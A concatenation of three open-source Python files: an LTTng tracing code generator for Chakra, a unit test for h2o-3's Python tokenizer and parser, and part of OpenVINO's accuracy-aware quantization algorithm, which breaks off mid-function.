providerLines.append("extern \"C\" bool EventXplatEnabled%s(){ return tracepoint_enabled(%s, %s);}"
% (eventName, providerName, eventName))
providerLines.append("")
template = None
if templateName:
template = templates[templateName]
providerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName + "(")
providerLines.append(generateMethodSignature(template))
providerLines.append(")")
providerLines.append("{")
providerLines.append(" if (!EventXplatEnabled" + eventName + "())")
providerLines.append(" return ERROR_SUCCESS;")
if template:
providerLines.append(generateMethodBody(template, providerName, eventName))
else:
providerLines.append(" do_tracepoint(" + providerName + ", " + eventName +");")
providerLines.append("")
providerLines.append(" return ERROR_SUCCESS;")
providerLines.append("}")
providerLines.append("")
return "\n".join(providerLines)
def generateEtwHeader(templates, events):
headerLines = []
headerLines.append("#include \"pal.h\"")
headerLines.append("")
for event in events:
eventName = event.getAttribute('symbol')
templateName = event.getAttribute('template')
template = None
if templateName:
template = templates[templateName]
callArgs = []
if template:
functionSignature = template.signature
for param in functionSignature.paramList:
if param in template.structCounts:
callArgs.append(param + "_ElementSize")
callArgs.append(param)
headerLines.append("extern \"C\" bool EventXplatEnabled" + eventName +"();")
headerLines.append("inline bool EventEnabled" + eventName +"() { return EventXplatEnabled" + eventName + "();}")
headerLines.append("")
headerLines.append("extern \"C\" unsigned long FireEtXplat" + eventName +" (")
headerLines.append(generateMethodSignature(template))
headerLines.append(");")
headerLines.append("inline unsigned long EventWrite" + eventName + "(")
headerLines.append(generateMethodSignature(template))
headerLines.append(")")
headerLines.append("{")
headerLines.append(" return FireEtXplat" + eventName + "(" + ", ".join(callArgs) + ");")
headerLines.append("}")
headerLines.append("")
return "\n".join(headerLines)
def generateCmakeFile(providerName):
cmakeLines = []
cmakeLines.append("project(Chakra.LTTng)")
cmakeLines.append("")
cmakeLines.append("add_compile_options(-fPIC)")
cmakeLines.append("")
cmakeLines.append("add_library (Chakra.LTTng OBJECT")
cmakeLines.append(" eventprovider" + providerName + ".cpp")
cmakeLines.append(" tracepointprovider" + providerName + ".cpp")
cmakeLines.append(")")
return "\n".join(cmakeLines)
def generateLttngFiles(manifest, providerDirectory):
import os
tree = DOM.parse(manifest)
if not os.path.exists(providerDirectory):
os.makedirs(providerDirectory)
if not os.path.exists(providerDirectory + "/lttng"):
os.makedirs(providerDirectory + "/lttng")
for providerNode in tree.getElementsByTagName("provider"):
providerName = providerNode.getAttribute("name")
providerName = providerName.replace("Microsoft-", "")
providerNameFile = providerName.lower()
lttngEventHeaderShortName = "tp" + providerNameFile + ".h"
lttngEventHeaderPath = providerDirectory + "/lttng/" + lttngEventHeaderShortName
lttngEventProvider = providerDirectory + "/lttng/eventprovider" + providerNameFile + ".cpp"
lttngEventProviderTrace = providerDirectory + "/lttng/tracepointprovider" + providerNameFile + ".cpp"
lttngEtwHeaderFile = providerDirectory + "/lttng/" + providerNameFile + "Etw.h"
lttngCmakeFile = providerDirectory + "/lttng/CMakeLists.txt"
lttngHeader = open(lttngEventHeaderPath, "w")
lttngImplementation = open(lttngEventProvider, "w")
lttngTraceImplementation = open(lttngEventProviderTrace, "w")
lttngEtwHeader = open(lttngEtwHeaderFile, "w")
lttngCmake = open(lttngCmakeFile, "w")
# Create the lttng implementation
lttngTraceImplementation.write("#define TRACEPOINT_CREATE_PROBES\n")
lttngTraceImplementation.write("#include \"./"+lttngEventHeaderShortName+"\"\n")
lttngTraceImplementation.close()
# Create the lttng header
templateNodes = providerNode.getElementsByTagName('template')
eventNodes = providerNode.getElementsByTagName('event')
allTemplates = parseTemplateNodes(templateNodes)
lttngHeader.write(generateLttngHeader(providerName, lttngEventHeaderShortName, allTemplates, eventNodes))
lttngHeader.close();
lttngImplementation.write(generateLttngTracepointProvider(providerName, lttngEventHeaderShortName, allTemplates, eventNodes))
lttngImplementation.close();
lttngEtwHeader.write(generateEtwHeader(allTemplates, eventNodes))
lttngEtwHeader.close()
# Note: This in particular assumes that there is only one ETW provider
lttngCmake.write(generateCmakeFile(providerNameFile))
lttngCmake.close()
if __name__ == '__main__':
import argparse
import sys
parser = argparse.ArgumentParser(description="Generates the Code required to instrument LTTtng logging mechanism")
required = parser.add_argument_group('required arguments')
required.add_argument('--man', type=str, required=True,
help='full path to manifest containig the description of events')
required.add_argument('--intermediate', type=str, required=True,
help='full path to eventprovider intermediate directory')
args, unknown = parser.parse_known_args(sys.argv[1:])
if unknown:
print('Unknown argument(s): ', ', '.join(unknown))
sys.exit(1)
generateLttngFiles(args.man, args.intermediate)
sys.exit(0)
|
h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 6,098 | 30351 | <reponame>vishalbelsare/h2o-3
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Test case for pyparser."""
from __future__ import division, print_function
import os
import re
import textwrap
import tokenize
from future.builtins import open
import pyparser
def _make_tuple(op):
return lambda x: (op, x)
NL = tokenize.NL
NEWLINE = tokenize.NEWLINE
NAME = _make_tuple(tokenize.NAME)
OP = _make_tuple(tokenize.OP)
INDENT = tokenize.INDENT
DEDENT = tokenize.DEDENT
COMMENT = tokenize.COMMENT
STRING = tokenize.STRING
NUMBER = tokenize.NUMBER
END = tokenize.ENDMARKER
token_names = {NL: "NL", NEWLINE: "NEWLINE", INDENT: "INDENT", COMMENT: "COMMENT", DEDENT: "DEDENT",
STRING: "STRING", NUMBER: "NUMBER", END: "END", tokenize.OP: "OP", tokenize.NAME: "NAME"}
Ws = pyparser.Whitespace
Comment = pyparser.Comment
Comment_banner = (pyparser.Comment, "banner")
Comment_code = (pyparser.Comment, "code")
Docstring = pyparser.Docstring
Import_future = (pyparser.ImportBlock, "future")
Import_stdlib = (pyparser.ImportBlock, "stdlib")
Import_3rdpty = (pyparser.ImportBlock, "third-party")
Import_1stpty = (pyparser.ImportBlock, "first-party")
Expression = pyparser.Expression
Function = (pyparser.Callable, "def")
Class = (pyparser.Callable, "class")
def assert_same_code(code1, code2):
"""Verify whether 2 code fragments are identical, and if not print an error message."""
regex = re.compile(r"\s+\\$", re.M)
code1 = re.sub(regex, r"\\", code1)
code2 = re.sub(regex, r"\\", code2)
if code2 != code1:
print()
lines_code1 = code1.splitlines()
lines_code2 = code2.splitlines()
n_diffs = 0
for i in range(len(lines_code1)):
old_line = lines_code1[i]
new_line = lines_code2[i] if i < len(lines_code2) else ""
if old_line != new_line:
print("%3d - %s" % (i + 1, old_line))
print("%3d + %s" % (i + 1, new_line))
n_diffs += 1
if n_diffs == 5: break
raise AssertionError("Unparsed code1 does not match the original.")
def test_tokenization():
"""
Test function for ``pyparser._normalize_tokens()``.
Even though this function is private, it is extremely important to verify that it behaves correctly. In
particular, we want to check that it does not break the round-trip guarantee of the tokenizer, and that it
fixes all the problems that the original tokenizer has.
"""
# Helper functions
def _parse_to_tokens(text):
"""Parse text into tokens and then normalize them."""
gen = iter(text.splitlines(True)) # True = keep newlines
readline = gen.next if hasattr(gen, "next") else gen.__next__
return pyparser._tokenize(readline)
def _unparse_tokens(tokens):
"""Convert tokens back into the source code."""
return tokenize.untokenize(t.token for t in tokens)
def _assert_tokens(tokens, target):
"""Check that the tokens list corresponds to the target provided."""
for i in range(len(tokens)):
assert i < len(target), "Token %d %r not expected" % (i, tokens[i])
tok = tokens[i]
trg = target[i]
valid = False
if isinstance(trg, int):
if tok.op == trg: valid = True
name = token_names[trg]
elif isinstance(trg, tuple) and len(trg) == 2:
if tok.op == trg[0] and tok.str == trg[1]: valid = True
name = "%s(%s)" % (token_names[trg[0]], trg[1])
else:
assert False, "Unknown target: %r" % trg
if not valid:
assert False, "Mismatched token %d: found %r, should be %r" % (i, tok, name)
assert len(target) == len(tokens), "Expected too many tokens: %d vs %d" % (len(tokens), len(target))
def check_code(code, expected_tokens=None, filename=None):
"""Test parsing of the given piece of code."""
code = textwrap.dedent(code)
if filename:
print("Testing tokenization of %s:" % filename, end=" ")
else:
check_code.index = getattr(check_code, "index", 0) + 1
print("Testing tokenization %d:" % check_code.index, end=" ")
tokens = _parse_to_tokens(code)
try:
try:
unparsed = _unparse_tokens(tokens)
except ValueError as e:
raise AssertionError("Cannot unparse tokens: %s" % e)
assert_same_code(code, unparsed)
if expected_tokens:
_assert_tokens(tokens, expected_tokens)
print("ok")
except AssertionError as e:
print(u"Error: %s" % e)
print(u"Original code fragment:\n" + code)
print("Tokens:")
for i, tok in enumerate(tokens):
print("%3d %r" % (i, tok))
raise
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, COMMENT, NL, DEDENT, DEDENT, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, DEDENT, COMMENT, NL, DEDENT, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
try:
while True:
pass
# comment
except: pass
""", [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
INDENT, NAME("pass"), NEWLINE, DEDENT, DEDENT, COMMENT, NL, NAME("except"), OP(":"),
NAME("pass"), NEWLINE, END]
)
check_code("""
def func():
# function
pass
""", [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def func(): # function
# hanging comment
pass
""", [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), COMMENT, NEWLINE, INDENT, COMMENT, NL,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def foo():
pass
#comment
def bar():
pass
""", [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
DEDENT, NL, COMMENT, NL, NAME("def"), NAME("bar"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT,
NAME("pass"), NEWLINE, DEDENT, END])
check_code("""
def hello():
print("hello")
""", [NL, NAME("def"), NAME("hello"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NL, NL,
NAME("print"), OP("("), STRING, OP(")"), NEWLINE, DEDENT, END])
check_code("""
class Foo:
def foo(self):
pass
def bar(self):
return
""", [NL, NAME("class"), NAME("Foo"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("foo"), OP("("),
NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, NL, NAME("def"),
NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("return"), NEWLINE, DEDENT,
DEDENT, END])
check_code("""
def foo():
# Attempt to create the output directory
try:
os.makedirs(destdir)
except OSError as e:
raise
""", [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL, NAME("try"),
OP(":"), NEWLINE, INDENT, NAME("os"), OP("."), NAME("makedirs"), OP("("), NAME("destdir"), OP(")"),
NEWLINE, DEDENT, NAME("except"), NAME("OSError"), NAME("as"), NAME("e"), OP(":"), NEWLINE, INDENT,
NAME("raise"), NEWLINE, DEDENT, DEDENT, END])
check_code("""
if PY2:
def unicode():
raise RuntimeError # disable this builtin function
# because it doesn't exist in Py3
handler = lambda: None # noop
# (will redefine later)
################################################################################
# comment 1
print("I'm done.")
""", [NL, NAME("if"), NAME("PY2"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("unicode"), OP("("), OP(")"),
OP(":"), NEWLINE, INDENT, NAME("raise"), NAME("RuntimeError"), COMMENT, NEWLINE, COMMENT, NL,
DEDENT, DEDENT, NL, NAME("handler"), OP("="), NAME("lambda"), OP(":"), NAME("None"), COMMENT, NEWLINE,
COMMENT, NL, NL, COMMENT, NL, NL, COMMENT, NL, NAME("print"), OP("("), STRING, OP(")"), NEWLINE, END])
check_code("""
def test3():
x = 1
# bad
print(x)
""", [NL, NAME("def"), NAME("test3"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("x"), OP("="),
NUMBER, NEWLINE, COMMENT, NL, NAME("print"), OP("("), NAME("x"), OP(")"), NEWLINE, DEDENT, END])
check_code("""
class Foo(object):
#-------------
def bar(self):
if True:
pass
# Originally the DEDENTs are all the way down near the decorator. Here we're testing how they'd travel
# all the way up across multiple comments.
# comment 3
# commmmmmmment 4
@decorator
""", [NL, NAME("class"), NAME("Foo"), OP("("), NAME("object"), OP(")"), OP(":"), NEWLINE, INDENT,
COMMENT, NL, NAME("def"), NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT,
NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
DEDENT, DEDENT, DEDENT, NL, COMMENT, NL, COMMENT, NL, NL, COMMENT, NL, NL, COMMENT,
NL, OP("@"), NAME("decorator"), NEWLINE, END])
# Really, one should avoid code like this.... It won't break the normalizer, but may create problems down
# the stream.
check_code("""
if True:
if False:
# INDENT will be inserted before this comment
raise
# DEDENT will be after this comment
else:
praise()
""", [NL, NAME("if"), NAME("True"), OP(":"), NEWLINE, INDENT, NAME("if"), NAME("False"), OP(":"), NEWLINE,
INDENT, COMMENT, NL, NAME("raise"), NEWLINE, COMMENT, NL, DEDENT, NAME("else"), OP(":"), NEWLINE,
INDENT, NAME("praise"), OP("("), OP(")"), NEWLINE, DEDENT, DEDENT, END])
for directory in [".", "../../h2o-py/h2o", "../../h2o-py/tests"]:
absdir = os.path.abspath(directory)
for dir_name, subdirs, files in os.walk(absdir):
for f in files:
if f.endswith(".py"):
filename = os.path.join(dir_name, f)
with open(filename, "rt", encoding="utf-8") as fff:
check_code(fff.read(), filename=filename)
def test_pyparser():
"""Test case: general parsing."""
def _check_blocks(actual, expected):
assert actual, "No parse results"
for i in range(len(actual)):
assert i < len(expected), "Unexpected block %d:\n%r" % (i, actual[i])
valid = False
if isinstance(expected[i], type):
if isinstance(actual[i], expected[i]): valid = True
elif isinstance(expected[i], tuple):
if isinstance(actual[i], expected[i][0]) and actual[i].type == expected[i][1]: valid = True
if not valid:
assert False, "Invalid block: expected %r, got %r" % (expected[i], actual[i])
def check_code(code, blocks=None, filename=None):
code = textwrap.dedent(code)
if not code.endswith("\n"): code += "\n"
if filename:
print("Testing file %s..." % filename, end=" ")
else:
check_code.index = getattr(check_code, "index", 0) + 1
print("Testing code fragment %d..." % check_code.index, end=" ")
preparsed = None
parsed = None
unparsed = None
try:
preparsed = pyparser.parse_text(code)
parsed = preparsed.parse(2)
try:
unparsed = parsed.unparse()
except ValueError as e:
for i, tok in enumerate(parsed.tokens):
print("%3d %r" % (i, tok))
raise AssertionError("Cannot unparse code: %s" % e)
assert_same_code(code, unparsed)
if blocks:
_check_blocks(parsed.parsed, blocks)
print("ok")
except AssertionError as e:
print()
print(u"Error: " + str(e))
print(u"Original code fragment:\n" + code)
if unparsed: print(u"Unparsed code:\n" + unparsed)
if parsed:
print(parsed)
for i, tok in enumerate(parsed.tokens):
print("%3d %r" % (i, tok))
raise
except Exception as e:
print()
print(u"Error: " + str(e))
if preparsed:
print("Preparsed tokens:")
for i, tok in enumerate(preparsed.tokens):
print("%4d %r" % (i, tok))
else:
print("Initial parsing has failed...")
raise
check_code("""
# -*- encoding: utf-8 -*-
# copyright: 2016 h2o.ai
\"\"\"
A code example.
It's not supposed to be functional, or even functionable.
\"\"\"
from __future__ import braces, antigravity
# Standard library imports
import sys
import time
import this
import h2o
from h2o import H2OFrame, init
from . import *
# Do some initalization for legacy python versions
if PY2:
def unicode():
raise RuntimeError # disable this builtin function
# because it doesn't exist in Py3
handler = lambda: None # noop
# (will redefine later)
################################################################################
# comment 1
class Foo(object):
#------ Public -------------------------------------------------------------
def bar(self):
pass
# def foo():
# print(1)
#
# print(2)
# comment 2
@decorated(
1, 2, (3))
@dddd
def bar():
# be
# happy
print("bar!")
# bye""", [Ws, Comment, Docstring, Import_future, Ws, Import_stdlib, Ws, Import_1stpty, Ws, Expression,
Ws, Expression, Ws, Comment_banner, Ws, Class, Ws, Comment_code, Ws, Function, Comment, Ws])
for directory in [".", "../../h2o-py", "../../py"]:
absdir = os.path.abspath(directory)
for dir_name, subdirs, files in os.walk(absdir):
for f in files:
if f.endswith(".py"):
filename = os.path.join(dir_name, f)
with open(filename, "rt", encoding="utf-8") as fff:
check_code(fff.read(), filename=filename)
# test_tokenization()
test_pyparser()
|
tools/pot/openvino/tools/pot/algorithms/quantization/accuracy_aware_common/algorithm.py | chccc1994/openvino | 2,406 | 30352 | <reponame>chccc1994/openvino
# Copyright (C) 2020-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import random
from copy import deepcopy
from sys import maxsize
import numpy as np
from .utils import create_metric_config, is_preset_performance, \
get_mixed_preset_config, evaluate_model, get_num_of_quantized_ops
from ..utils import load_hardware_config
from ...algorithm import Algorithm
from ...algorithm_selector import COMPRESSION_ALGORITHMS
from ....algorithms.quantization import utils as eu
from ....graph import node_utils as nu
from ....graph.model_utils import save_model, get_nodes_by_type
from ....graph.transformer import GraphTransformer
from ....samplers.creator import create_sampler
from ....statistics.statistics import TensorStatistic
from ....utils.logger import get_logger
from ....utils.telemetry import send_event
logger = get_logger(__name__)
# pylint: disable=R0912
@COMPRESSION_ALGORITHMS.register('AccuracyAwareCommon')
class AccuracyAwareCommon(Algorithm):
name = 'AccuracyAwareCommon'
def __init__(self, config, engine):
super().__init__(config, engine)
# configure default parameters
default_config = {
'metric_subset_ratio': 0.5,
'ranking_subset_size': config.get('ranking_subset_size', min(len(engine.data_loader), 300)),
'max_iter_num': maxsize,
'maximal_drop': 0.01,
'drop_type': 'absolute',
'use_prev_if_drop_increase': True,
'base_algorithm': 'DefaultQuantization',
'annotation_free': False,
'tune_hyperparams': False,
'annotation_conf_threshold': 0.6,
'convert_to_mixed_preset': False
}
for setting in default_config:
if setting not in self._config:
self._config[setting] = default_config[setting]
self._config.convert_to_mixed_preset = self._config.convert_to_mixed_preset and \
is_preset_performance(self._config)
save_dir = self._config.get('exec_log_dir', os.path.curdir)
self._config.intermediate_log_dir = os.path.join(save_dir, 'accuracy_aware_intermediate')
self._engine.calculate_metrics = True
# Create initial quantization algorithms
self._quantization_algo = self._create_quantization_algo(self._config, 'AAQuantizationAlgorithm', self._engine)
self._preset_conversion_algo = self._create_quantization_algo(get_mixed_preset_config(self._config),
'AAConversionAlgorithm', self._engine)
self._grid_search_algo = COMPRESSION_ALGORITHMS.get('ParamsGridSearchAlgorithm')(self._config, engine)
self._grid_search_algo.default_algo = self._quantization_algo
# Configure metrics
self._metrics_config = create_metric_config(self._engine, self._config)
self._baseline_metric = {metric.name: metric.baseline_value
for metric in self._config.metrics
if metric.name in self._metrics_config} \
if self._config.metrics and \
all('baseline_value' in metric.keys() for metric in self._config.metrics) \
else {}
self._max_drop_by_name = {}
self._original_per_sample_metrics = None
self._output_node_name, self._stats_layout = None, None
self._quantized_layers_num = 0
self._dataset_size = len(self._engine.data_loader)
metric_subset_size = int(self._dataset_size * self._config.metric_subset_ratio)
self._diff_subset_indices = sorted(random.sample(range(self._dataset_size), metric_subset_size)) \
if metric_subset_size < self._dataset_size and self._baseline_metric \
else list(range(self._dataset_size))
self._graph_transformer = GraphTransformer(load_hardware_config(self._config))
self.default_steps_size = 0.005
self.total_exec_steps = self._config.get('stat_subset_size', self._dataset_size)
self._quantization_algo.default_steps_size = self.default_steps_size
if self._config.convert_to_mixed_preset:
self._preset_conversion_algo.default_steps_size = self.default_steps_size
self._stats_collector = None
self._precision_change_to = 'floating-point'
self._need_to_change_scope = True
self._change_conditions = None
self._exclude_bad_nodes = False
@property
def change_original_model(self):
return True
def register_statistics(self, model, stats_collector):
self._stats_collector = stats_collector
self._quantization_algo.register_statistics(model, stats_collector)
if self._config.convert_to_mixed_preset:
self._preset_conversion_algo.register_statistics(model, stats_collector)
if self._config.tune_hyperparams:
self._grid_search_algo.register_statistics(model, stats_collector)
def run(self, model):
""" this function applies the accuracy aware
quantization scope search algorithm
:param model: model to apply algo
:return model with modified quantization scope to match
required accuracy values
"""
if not self._metrics_config:
logger.info('Could not find the required metrics for optimization in the engine. '
'Stop AccuracyAware optimization. '
'Available metrics: %s.', ', '.join(self._engine.get_metrics_attributes()))
logger.update_progress(self.total_exec_steps)
return model
# configure stats layout to collect raw output
# to calculate persample difference for special metrics
self._output_node_name = nu.get_node_input(
model.get_final_output_nodes()[0], 0).name # gets first output node
for metric_config in self._metrics_config.values():
if metric_config.persample.is_special:
self._stats_layout = {self._output_node_name: {'output_logits': TensorStatistic(lambda a: a)}}
break
self._request_alt_statistics(model)
print_progress = logger.progress_bar_disabled
if not self._baseline_metric or self._config.annotation_free:
# collect predictions of original model
if self._config.annotation_free:
self._engine.dump_prediction_to_annotation = True
self._engine.annotation_conf_threshold = self._config.annotation_conf_threshold
self._baseline_metric, self._original_per_sample_metrics = self._collect_baseline(model, print_progress)
logger.info('Baseline metrics: %s', self._baseline_metric)
# update dataset info
if self._config.annotation_free:
self._dataset_size = len(self._engine.data_loader)
self._diff_subset_indices = list(range(self._dataset_size))
# configure values of metrics maximum drop
max_drop = self._config.maximal_drop
if self._config.drop_type == 'relative':
self._max_drop_by_name = {name: value * max_drop for name, value in self._baseline_metric.items()}
else:
self._max_drop_by_name = {name: max_drop for name, value in self._baseline_metric.items()}
# quantize model
quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample = \
self._quantize_and_evaluate(deepcopy(model),
self._quantize_model,
print_progress=print_progress)
self._save_intermediate_model(quantized_model)
if self._drop_restrictions_are_met(metrics_accuracy_drop):
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0))
return quantized_model
default_quantization_config = self._quantization_algo.config
# change quantization preset of the model if possible
if self._config.convert_to_mixed_preset:
quantized_model, metrics_accuracy_drop, quantized_metrics_per_sample = \
self._quantize_and_evaluate(deepcopy(model),
self._convert_model_to_mixed_preset,
print_progress=print_progress)
self._save_intermediate_model(quantized_model)
if self._drop_restrictions_are_met(metrics_accuracy_drop):
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0))
return quantized_model
default_quantization_config = self._preset_conversion_algo.config
if not self._original_per_sample_metrics:
_, self._original_per_sample_metrics = \
self._evaluate_model(model=model, subset_indices=self._diff_subset_indices)
# change quantization parameters of the model
if self._config.tune_hyperparams:
worst_ranking_subset = self._create_hardest_ranking_subset(quantized_metrics_per_sample)
self._grid_search_algo.update_config(default_quantization_config)
self._grid_search_algo.set_subset_and_metric(worst_ranking_subset,
self._metrics_config)
self._engine.allow_pairwise_subset = True
updated_quantized_model, updated_metrics_accuracy_drop, updated_quantized_metrics_per_sample = \
self._quantize_and_evaluate(deepcopy(model),
self._search_optimal_parameters,
print_progress=print_progress)
default_mean_drop = np.mean([value for name, value in metrics_accuracy_drop.items()])
updated_mean_drop = np.mean([value for name, value in updated_metrics_accuracy_drop.items()])
if updated_mean_drop < default_mean_drop:
logger.info('Applying the best configuration')
quantized_model = updated_quantized_model
metrics_accuracy_drop = updated_metrics_accuracy_drop
quantized_metrics_per_sample = updated_quantized_metrics_per_sample
self._engine.allow_pairwise_subset = False
self._save_intermediate_model(quantized_model)
if self._drop_restrictions_are_met(metrics_accuracy_drop):
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, 0))
return quantized_model
# we need to do this for more efficient memory consumption which is too high
# because _change_quantization_scope(..) will allocate one more model
del model
if self._need_to_change_scope:
return self._change_quantization_scope(quantized_model,
metrics_accuracy_drop,
quantized_metrics_per_sample)
logger.info('Quantization scope was not changed due to algo conditions: %s', self._change_conditions)
logger.update_progress(self.total_exec_steps)
return quantized_model
def _collect_baseline(self, model, print_progress):
logger.info('Start original model inference')
return self._evaluate_model(model=model,
print_progress=print_progress)
def _change_quantization_scope(self, model, original_accuracy_drop,
fully_quantized_metrics_per_sample):
"""Applies greedy search to remove fake-quantize nodes that degrade metric values
:param model: fully quantized model
:param original_accuracy_drop: dictionary of per-metric drops
of fully quantized model {metric_name: drop_value}
:param fully_quantized_metrics_per_sample: dictionary of per-sample metrics values
of fully quantized model
:return model: model with new quantization scope
"""
self._quantized_layers_num = \
self._get_num_of_quantized_ops(model)
logger.info('The total number of quantized operations in the graph: %d', self._quantized_layers_num)
logger.info('Changing fake quantize nodes scope')
all_changed_nodes_names = []
all_ops_in_targeted_prec = set()
drop_functor = lambda a: (original_accuracy_drop[a] - self._max_drop_by_name[a]) / self._baseline_metric[a]
metric_to_optimize = sorted(original_accuracy_drop.keys(), key=drop_functor)[-1]
logger.info('Optimizing %s metric', metric_to_optimize)
accuracy_drop = original_accuracy_drop[metric_to_optimize]
# calculate importance of fq nodes
node_importance = self._get_node_importance(model,
metric_to_optimize,
fully_quantized_metrics_per_sample)
quantized_metrics_per_sample = None
reached_required_drop = False
changed_all_fq = False
is_step_back = True
iteration = 0
excluded_nodes = []
for iteration in range(self._config.max_iter_num):
# save model and metrics from previous iteration
model_prev_iter = deepcopy(model)
metrics_prev_iter = deepcopy(quantized_metrics_per_sample)
if not node_importance:
logger.info(
'All layers have been checked and the AccuracyAwareQuantization '
'will not be able to achieve the required accuracy drop')
changed_all_fq = True
break
# greedy removal of the FQ node with the highest importance score
fq_name_to_change = node_importance.pop(0)
model, changed_nodes, ops_in_targeted_prec = self._modify_model_in_scope(model,
[fq_name_to_change])
logger.debug('Changed a block of %d FQ layers: %s', len(changed_nodes), changed_nodes)
logger.info('Reverted %d layers to the %s precision: %s',
len(ops_in_targeted_prec), self._precision_change_to, ', '.join(ops_in_targeted_prec))
all_changed_nodes_names.append(str(changed_nodes))
all_ops_in_targeted_prec.update(ops_in_targeted_prec)
# save intermediate model
self._save_intermediate_model(model)
# calculate drop for new quantization scope
final_metrics, quantized_metrics_per_sample = \
self._evaluate_model(model=model,
per_sample_subset_indices=self._diff_subset_indices,
print_progress=True)
metrics_accuracy_drop = {name: params.comparator(self._baseline_metric[name]
- final_metrics[name])
for name, params in self._metrics_config.items()}
new_accuracy_drop = metrics_accuracy_drop[metric_to_optimize]
logger.info('Accuracy drop with the new quantization scope is %s', metrics_accuracy_drop)
# removed all fake-quantize layers from the model
if not get_nodes_by_type(model, ['FakeQuantize']):
logger.info('Removed all FQ layers from the network!')
changed_all_fq = True
break
# all drop restrictions are met
if self._drop_restrictions_are_met(metrics_accuracy_drop):
reached_required_drop = True
break
# continue greedy fq removal
if self._max_drop_by_name[metric_to_optimize] < new_accuracy_drop <= accuracy_drop \
or (new_accuracy_drop > accuracy_drop and is_step_back):
is_step_back = False
accuracy_drop = new_accuracy_drop
continue
# if after fq removal drop has increased
# calculate node importance of the model (from previous iteration)
if new_accuracy_drop > accuracy_drop and self._config.use_prev_if_drop_increase:
model = model_prev_iter
quantized_metrics_per_sample = metrics_prev_iter
all_changed_nodes_names.remove(str(changed_nodes))
all_ops_in_targeted_prec.difference_update(ops_in_targeted_prec)
if self._exclude_bad_nodes:
excluded_nodes.extend(changed_nodes)
logger.debug('%s added to excluded list: %s', str(changed_nodes), str(excluded_nodes))
is_step_back = True
accuracy_drop = new_accuracy_drop
# if drop restriction for the current metric is satisfied, select the next metric
# and calculate node importance
if new_accuracy_drop <= self._max_drop_by_name[metric_to_optimize]:
metric_to_optimize = sorted(original_accuracy_drop.keys(),
key=lambda a, current_drop=metrics_accuracy_drop:
(current_drop[a] - self._max_drop_by_name[a]) /
self._baseline_metric[a])[-1]
logger.info('Optimizing %s metric', metric_to_optimize)
accuracy_drop = original_accuracy_drop[metric_to_optimize]
is_step_back = False
del model_prev_iter, metrics_prev_iter
logger.info('Re-calculating node importance')
node_importance = self._get_node_importance(model,
metric_to_optimize,
quantized_metrics_per_sample,
excluded_nodes)
if changed_all_fq or not reached_required_drop:
# Do not remove or change!
logger.info('AccuracyAwareQuantization could not achieve the required accuracy drop.',
force=True)
if iteration + 1 >= self._config.max_iter_num:
logger.info('Reached maximum number of iterations.')
if not changed_all_fq:
logger.debug('Changed FakeQuantize nodes:\n %s', '\n'.join(all_changed_nodes_names))
logger.info(' %d out of %d layers have been reverted back to the %s precision: %s',
len(all_ops_in_targeted_prec), self._quantized_layers_num, self._precision_change_to,
', '.join(all_ops_in_targeted_prec))
send_event("result_aa", self._get_result_aa(metrics_accuracy_drop, len(all_ops_in_targeted_prec)))
logger.update_progress(self.total_exec_steps)
return model
def _get_node_importance(self, model, metric_name, qmodel_per_sample_metrics=None, excluded_nodes=None):
"""Creates a list of fake-quantize nodes importance in descending order
based on their contribution to metric degradation
:param model: model with fake-quantize nodes
:param metric_name: metric to be taken into consideration
:param qmodel_per_sample_metrics: per-sample metrics values of quantized model
:return list of node names
"""
if qmodel_per_sample_metrics is None:
# get quantized model predictions
_, qmodel_per_sample_metrics = self._evaluate_model(model=model,
subset_indices=self._diff_subset_indices)
ranking_subset = self._get_ranking_subset(qmodel_per_sample_metrics, metric_name) # not sorted
node_importance_score = self._calculate_node_importance_scores(model,
ranking_subset,
metric_name,
excluded_nodes)
# sort by error value and then by node name
node_importance = sorted(node_importance_score.items(), key=lambda x: (x[1], x[0]), reverse=True)
node_importance = [n[0] for n in node_importance]
return node_importance
def _get_ranking_subset(self, qmodel_per_sample_metrics, metric_name, from_id=0):
"""Determines samples on which the quantized model predicts worse than on the original model
:param qmodel_per_sample_metrics: per-sample metrics values of the quantized model
:param metric_name: metric to take into account
:return a list of image ids
"""
persample_metric = self._metrics_config[metric_name].persample
sorted_sample_importance = \
persample_metric.sort_fn(self._original_per_sample_metrics[persample_metric.name],
qmodel_per_sample_metrics[persample_metric.name],
reverse=True)
to_id = from_id + self._config.ranking_subset_size
